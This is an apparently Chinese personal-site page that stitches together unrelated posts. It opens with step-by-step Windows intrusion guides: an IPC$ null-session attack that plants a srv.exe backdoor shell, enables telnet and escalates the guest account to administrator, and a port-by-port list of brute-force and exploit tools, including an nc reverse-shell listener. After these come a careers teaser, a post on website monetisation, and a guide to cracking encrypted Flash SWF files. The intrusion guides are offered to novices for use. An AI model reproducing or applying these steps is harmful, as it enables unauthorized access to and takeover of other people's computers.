梦想天地

经典总结：各个网络端口的入侵
经典IPC$入侵

1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\>copy srv.exe $">\\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\>net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊.

5. C:\>net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32>ntlm

输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

10. C:\>net user guest /active:yes

将对方的Guest用户激活

11. C:\>net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

经典总结：各个网络端口的入侵
希望对新手入侵有帮助！

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入。（啊D的注入软件）。

5. serv-u入侵(21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

        每个毕业生都难免会得一次毕业焦虑症，无论你此刻面对离校的心情是迫不及待还是紧张不安———就好像过山车已经慢慢爬升到了那个转折性的顶端，你知道在接下来的那么几秒之后就会进入一个飞速运转的轨道，而你不知道自己是否已经做好了足够的准备来应对接下来的改变。

　假设职场就是一架高速运转中的过山车，难道我们能做的就是被迫感受？闭着眼睛，大脑一片空白，以惊声尖叫来阻挡周围发生的一切，只希望这可怕的乾坤大挪移赶快停止？

　　然而职场的运转永远不会停滞，任何情况下的忘记和迷失都意味着陷入被动。所以对于毕业生来说，最要紧的并不是急于在千军万马涌入的过山车上求得一个座位，而是先找到自己。

　　这个寻找自己的过程包括两方面的内容，一是了解当下职场中关于第一份工作这个话题的现状、热点和趋势，这是毕业生找准自己的基础；二是认清自己的长板和个人发展的方向，这是在职场中找到自己位置的指南针。

阅读全文...

如果有人直接告诉你这个问题的答案，那么十有八九这个人是骗子或者是在推广他的产品。因为没有什么网站放在那里就能赚钱，还最赚钱，能赚钱就不说出来了。

我先介绍几种个人站长最常做的网站形式。

网址站。HAO123.COM, 265.COM就是网址站的代表。hao123大价钱卖给百度之后，出现一段网址热，很多人都在做这个，现在几乎没有出路了，劝大家别去做这个。

音乐站-手机铃声站。虽然现在版权管的开始严格了，但是做这个的个人站依然很多，并且赚大钱也不少，我曾经看到过一个站长贴出他的日收入，平均每天能近万元，非常厉害。

阅读全文...

　　详解Flash文件的加密与破解技术常用破解工具

　　谈到破解，很多朋友都会想到时下流行的闪客精灵。以下为常用的破解工具，按我使用的频繁程度，分别有：

　　·硕思闪客精灵(Sothink SWF Decompiler)

　　·Action Script Viewer(ASV)

　　·Imperator FLA(有使用者译为“罗马统治者”)

　　这是我最早认识的用来还原swf的工具，可惜一直在关注也没有发现2.0以上的破解版，只有1.6.9.8的破解版，这已经是3年前的版本了，只对Flash6.0以下有效。)

　　·硕思闪客之锤(Sothink SWF Quicker)

　　以上四款，以Decompiler最为常用。ASV虽然强大，但在实用性方面却不如Decompiler，这应当也是为什么数年来Decompiler能够长久风靡的原因。而ASV对付Flashincrypt加密过的swf却是轻而易举，这大大弥补了Decompiler的不足。

　　不少网友知道用ASV来查看swf，但是不知道如何使用它来将swf还原成fla，以5.01版本为例，只需两步：

　　·打开等待破解的swf文件(支持拖放打开)，输出重建数据(File → Export Rebuild Data (JSFL)...)到某一目录下，例如：桌面\新建文件夹。

　　·双击目录下的“rebuildcommand.jsfl”，系统将启动Flash重建fla文件。根据原swf文件的复杂程度，重建fla所需的时间将有所区别。

　　破解附言

　　破解swf，依赖的主要是现成工具，多款工具综合使用，一款不行试另一款，如果作者有意加密，视破解者自身水平，在获取swf时将遇到规模可大可小的困难，在破解时亦将不可避免的多花些许心思。如果遇到 SWF Encrypt 加密过的作品，只能对其中的AS无奈了。

　　

　　破解和防破解是必是同时存在的对立体。如同制造病毒和防范病毒一样，制造病毒的言论从不会公开出现在一些名门场合，所以每当病毒来袭，防范的一方总是措不及防。我们更希望看到的不是偷偷摸摸，而是从破解和防范中学习到实用的技术和知识。

　　一、破解篇

　　这里所谈的破解，包括提取swf、破解已加密及未加密的swf，即通常所说的“swf to fla”。

　　获取swf的工具

　　·Flash Saver - 保存网页中的swf

　　·Flash文件格式转换器(FlashChanger) - 转换未加壳的exe为swf

　　·Flash吸血鬼 - 不得已时用之。

　　提取范围很广，只要能看到Flash的窗口，包括加壳及未加壳的exe、网页等等。在使用Flash吸血鬼提取swf的过程中建议不要进行其他操作，否则速度会变得极其缓慢，配置不好的机器有可能死机。这也是这款软件目前版本(v2.2)最大的一个不足之处。如果想中止程序，可以在任务管理器中结束。

　　使用Temporary Internet Files(IE缓存)下载MV、SWF等资源

　　偶尔会有网友问我关于网上 MV 如何下载，其实方法很简单，只要到 Temporary Internet Files 文件夹下就能找到想找的大部分网络资源。

　　Temporary Internet Files 是 IE 的临时文件夹。目录一般在C:\Documents and Settings\你的用户名\Local Settings\Temporary Internet Files

　　使用 Temporary Internet Files 查找资源的技巧：先清空 Temporary Internet Files，然后用 IE 打开或刷新你要找的资源 (比如 MV) 所在的网页。再刷新 Temporary Internet Files 就能看到了，如果资源比较大，需要过一会，等下载完后再刷新才能看到。

　　有时，部分资源会被隐藏。查看 Temporary Internet Files 的属性可以断定里面有文件，可是里面的内容却看不到。此时，用 WinRAR 压缩一下 Temporary Internet Files 就能看到了。为了不浪费时间，压缩的时候，压缩方式请选择“存储”。为了便于搜索查找，可以把压缩后的 Temporary Internet Files 解压到另一个目录下，里面的东西此时已经一目了然，分别分布在 Content.IE5 文件夹下的四个子文件夹中。

　　可以将 Temporary Internet Files 移动到其他分区下，一方面可以给系统分区减负，另一方面也便于查找。移动方法如下：

　　 Internet 选项 → 常规选项卡 → 在“Internet 临时文件”区点击“设置” → 移动文件夹 → 选择一个分区，例如选择 D，就把 Temporary Internet Files 移到了 D 盘的根目录下。最后会提示重启，其实不是重启，是注销。记得保存当前的其他工作，按确定注销。

　　从Word中提取Flash

　　测试环境：WindowsXP / Office2003

　　·需要一款16进制编辑工具WinHex

　　·打开含有Flash的Word文档，点击“控件工具箱”的“设计模式”按钮进入设计模式，选择Word中的Flash，复制粘贴到任意文件夹，会看到一个“片段”文件。

　　·打开WinHex，将该“片段”文件拉到WinHex中，单击下拉菜单“搜索”→“查找16进制值”，搜索“465753”，在搜索到的“465753”中的“4”位置上单击右键，选择“选块开始”。

　　·继续“搜索”→“查找16进制值”，搜索“3A5C”，然后按住F3，直到出现“3A5C未找到”，点击“是”，在最后搜索到的“3A5C”中“C”位置上单击右键，选择“选块结尾”。（注：少数情况可能会搜索不到“3A5C”，则改为搜索“3A”或“5C”，方法相同）。

　　·在选块内任意处点击右键→编辑→复制选块→进入新文件→输入文件名 (如test.swf) →保存。